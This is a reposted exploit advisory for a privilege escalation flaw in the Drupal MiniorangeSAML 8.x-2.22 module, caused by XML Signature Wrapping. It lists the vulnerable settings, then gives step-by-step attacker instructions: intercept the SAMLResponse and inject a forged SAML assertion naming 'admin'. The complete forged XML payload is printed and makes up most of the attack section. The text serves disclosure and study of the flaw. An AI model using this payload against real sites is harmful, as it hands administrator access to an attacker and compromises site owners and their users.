Home Tools Exploits & CVE's Drupal MiniorangeSAML 8.x-2.22 Privilege Escalation

Drupal MiniorangeSAML 8.x-2.22 Privilege Escalation

October 3, 2021

683

Drupal MiniorangeSAML module version 8.x-2.22 suffers from a privilege escalation vulnerability via XML Signature Wrapping.

Change Mirror Download

# Exploit Title: Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalation via XML Signature Wrapping
# Date: 09/07/2021
# Exploit Author: Cristian 'void' Giustini
# Vendor Homepage: https://www.miniorange.com/
# Software Link: https://www.drupal.org/project/miniorange_saml
# Version: 8.x-2.22 (REQUIRED)
# Tested on: Linux Debian (PHP 8.0.7 with Apache/2.4.38)
# Original article:  https://blog.hacktivesecurity.com/index.php/2021/07/09/sa-contrib-2021-036-notsosaml-privilege-escalation-via-xml-signature-wrapping-on-minorangesaml-drupal-plugin/
# Drupal Security Advisory URL: https://www.drupal.org/sa-contrib-2021-036

---

The MiniorangeSAML Drupal Plugin v. 8.x-2.22 is vulnerable to XML 
Signature Wrapping Attacks that could allows an attacker to perform 
privilege escalation attacks.

In order to exploit the vulnerability, the plugin must be configured 
with the "Either SAML reponse or SAML assertion must be signed" options 
enabled and an empty "x509 certificate".

Administrator point of view:

- Install a Drupal version (for the PoC the version 9.1.10 has been used)

- Configure an external SSO system like Auth0

- Configure the plugin with the Auth0 provider by checking the "Either 
SAML response or SAML assertion must be signed" and empty "x509 certificate"


Attacker point of view:

- Register a normal user on the website

- Perform a login

- Intercept the request with Burp Suite and decode the SAMLResponse 
parameter

- Inject an additional <Saml:Assertion> object before the original one 
(example here: 
https://gist.github.com/voidz0r/30c0fb7be79abf8c79d1be9d424c9e3b#file-injected_object-xml) 
(SAMLRaider Burp extension, XSW3 payload)

<saml:Assertion ID="_evil_assertion_ID" IssueInstant="2021-06-23T21:04:01.551Z" Version="2.0"
 xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">
 <saml:Issuer>urn:miniorange-research.eu.auth0.com</saml:Issuer>
 <saml:Subject>
 <saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified">admin</saml:NameID>
 <saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
 <saml:SubjectConfirmationData InResponseTo="_f1e26bb0bd40be366c543e2c3fe0215747f40dadbb" NotOnOrAfter="2021-06-23T22:04:01.551Z" Recipient="http://localhost:8080/samlassertion"/>
 </saml:SubjectConfirmation>
 </saml:Subject>
 <saml:Conditions NotBefore="2021-06-23T21:04:01.551Z" NotOnOrAfter="2021-06-23T22:04:01.551Z">
 <saml:AudienceRestriction>
 <saml:Audience>http://localhost:8080</saml:Audience>
 </saml:AudienceRestriction>
 </saml:Conditions>
 <saml:AuthnStatement AuthnInstant="2021-06-23T21:04:01.551Z" SessionIndex="_WWwvhpmMv5eJI4bwPdsPAiasFpTH8gt_">
 <saml:AuthnContext> <saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:unspecified</saml:AuthnContextClassRef>
 </saml:AuthnContext>
 </saml:AuthnStatement>
 <saml:AttributeStatement xmlns:xs="http://www.w3.org/2001/XMLSchema"
 xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
 <saml:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
 <saml:AttributeValue xsi:type="xs:string">admin</saml:AttributeValue>
 </saml:Attribute>
 <saml:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
 <saml:AttributeValue xsi:type="xs:string">[email protected]</saml:AttributeValue>
 </saml:Attribute>
 <saml:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
 <saml:AttributeValue xsi:type="xs:string">[email protected]</saml:AttributeValue>
 </saml:Attribute>
 <saml:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/upn" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
 <saml:AttributeValue xsi:type="xs:string">[email protected]</saml:AttributeValue>
 </saml:Attribute>
 <saml:Attribute Name="http://schemas.auth0.com/identities/default/connection" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
 <saml:AttributeValue xsi:type="xs:string">Username-Password-Authentication</saml:AttributeValue>
 </saml:Attribute>
 <saml:Attribute Name="http://schemas.auth0.com/identities/default/provider" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
 <saml:AttributeValue xsi:type="xs:string">auth0</saml:AttributeValue>
 </saml:Attribute>
 <saml:Attribute Name="http://schemas.auth0.com/identities/default/isSocial" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
 <saml:AttributeValue xsi:type="xs:boolean">false</saml:AttributeValue>
 </saml:Attribute>
 <saml:Attribute Name="http://schemas.auth0.com/clientID" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
 <saml:AttributeValue xsi:type="xs:string">8bbK44pPnBAqzN49pSuwmgdhgsZavkNI</saml:AttributeValue>
 </saml:Attribute>
 <saml:Attribute Name="http://schemas.auth0.com/created_at" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
 <saml:AttributeValue xsi:type="xs:anyType">Wed Jun 23 2021 21:01:51 GMT+0000 (Coordinated Universal Time)</saml:AttributeValue>
 </saml:Attribute>
 <saml:Attribute Name="http://schemas.auth0.com/email_verified" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
 <saml:AttributeValue xsi:type="xs:boolean">false</saml:AttributeValue>
 </saml:Attribute>
 <saml:Attribute Name="http://schemas.auth0.com/nickname" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
 <saml:AttributeValue xsi:type="xs:string">test</saml:AttributeValue>
 </saml:Attribute>
 <saml:Attribute Name="http://schemas.auth0.com/picture" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
 <saml:AttributeValue xsi:type="xs:string">https://s.gravatar.com/avatar/55502f40dc8b7c769880b10874abc9d0?s=480&r=pg&d=https%3A%2F%2Fcdn.auth0.com%2Favatars%2Fte.png</saml:AttributeValue>
 </saml:Attribute>
 <saml:Attribute Name="http://schemas.auth0.com/updated_at" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">

 <saml:AttributeValue xsi:type="xs:anyType">Wed Jun 23 2021 21:01:51 GMT+0000 (Coordinated Universal Time)</saml:AttributeValue>

 </saml:Attribute>

 </saml:AttributeStatement>

</saml:Assertion>

- Replace the username with one with higher privileges (like admin)

- Submit the request

- Successful exploitation

Drupal MiniorangeSAML 8.x-2.22 Privilege Escalation

Follow us on Instagram @thecyberpost

EDITOR PICKS

Kaiser’s website tracking tools may have compromised data on 13 million...

British intelligence moves to protect research universities from espionage

DHS announces AI safety board with OpenAI founder, CEOs of Microsoft,...

POPULAR POSTS

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

Domhttpx – A Google Search Engine Dorker With HTTP Toolkit Built...

POPULAR CATEGORY

Menorah Restaurant 1.0.0 Insecure Settings

PrusaSlicer 2.6.1 Arbitrary Code Execution

WordPress WPFront Notification Bar 1.9.1.04012 Cross Site Scripting